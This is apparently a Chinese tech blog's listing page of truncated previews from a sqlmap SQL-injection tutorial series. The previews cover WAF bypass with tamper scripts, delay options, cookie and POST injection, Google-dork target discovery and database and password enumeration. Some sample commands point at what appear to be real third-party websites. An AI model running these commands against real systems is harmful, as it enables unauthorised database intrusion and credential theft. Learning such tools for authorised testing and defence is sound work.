Fly_鹏程万里

专注于IT技术,只做IT技术的分享与研究,欢迎广大IT技术人员参与分享与讨论!...

SQLmap————10、sqlmap详细命令

Sqlmap各种纤细命令:-is-dba 当前用户权限(是否为root权限)-dbs 所有数据库-current-db 网站当前数据库-users 所有数据库用户-current-user 当前数据库用户-random-agent 构造随机user-agent-passwords 数据库密码-pr...

2018-05-05 08:44:46

阅读数 351

评论数 0

SQLmap————9、使用参数绕防火墙

检测web服务是否受到防火墙保护首选sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4--thread 10   --identify-waf备选sqlmap -uhttp://yiliao.king...

2018-05-05 08:44:14

阅读数 156

评论数 0

Sqlmap————8、SQLmap延时注入

参数: --delay--safe-freq格式:Sqlmap -u http://sfl.fzu.edu.cn/index.php/Index/view/id/40.html --dbs   --delay    1sqlmap -u http://sfl.fzu.edu.cn/index.ph...

2018-05-05 08:43:57

阅读数 1277

评论数 0

Sqlmap————7、Tamper脚本绕WAF

0x01 start脚本名:apostrophemask.py作用:用utf8代替引号 Example: ("1 AND '1'='1") '1 AND%EF%BC%871%EF%BC%87=%EF%BC%871' Tested against: all脚本名:...

2018-05-04 18:33:11

阅读数 258

评论数 1

SQLmap————6、搜索型注入

参数—————— -gsqlmap可以测试注入Google的搜索结果中的Get参数(只获取前100个结果)例如:sqlmap -g "inurl:php?eid="如果可以注入,那么之后和常规一样,通过“--dbs\--tables\--columns\--du...

2018-05-04 18:11:07

阅读数 365

评论数 1

Sqlmap————5、POST注入

具体流程:(1)浏览器打开目标地址http:// www.xxx.com /Login.asp(2)配置burp代理(127.0.0.1:8080)以拦截请求(3)点击login表单的submit按钮(4)这时候Burp会拦截到了我们的登录POST请求(5)把这个post请求复制为txt, 我这命...

2018-05-04 17:57:32

阅读数 541

评论数 0

SQLmap————4、Cookie注入

说明:默认情况下SQLMAP只支持GET/POST参数的注入测试,但是当使用–level 参数且数值>=2的时候也会检查cookie时面的参数,当>=3的时候将检查User-agent和Referer,那么这就很简单了,我们直接在原有的基础上面加上 –l...

2018-05-04 17:54:56

阅读数 205

评论数 0

SQLmap————3、MySQL注入

MySQL注入流程1、判断是否可以注入Sqlmap  –u  http://www.xxx.com/login.php?id=12、猜解数据库名称Sqlmap  –u  http://www.xxx.com/login.php?id=1   --Database3、猜解表名Sqlmap  –u  ...

2018-05-04 17:50:52

阅读数 148

评论数 0

SQLmap————2、Access注入

1、判断给定的URL是否能注入Windows下:sqlmap.py  –u   http://www.xxx.com/sql/test.asp?id=1Linux下:sqlmap  –u    http://www.xxx.com/sql/test.asp?id=12、猜解数据库名称Windows...

2018-05-04 17:48:24

阅读数 158

评论数 0

SQLmap ————1、sqlmap简介以及sqlmap的安装

sqlmap简介Sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。支持的数据库:MySQL, Oracle, PostgreSQL, Micr...

2018-05-04 17:43:02

阅读数 204

评论数 0

提示
确定要删除当前文章?
取消 删除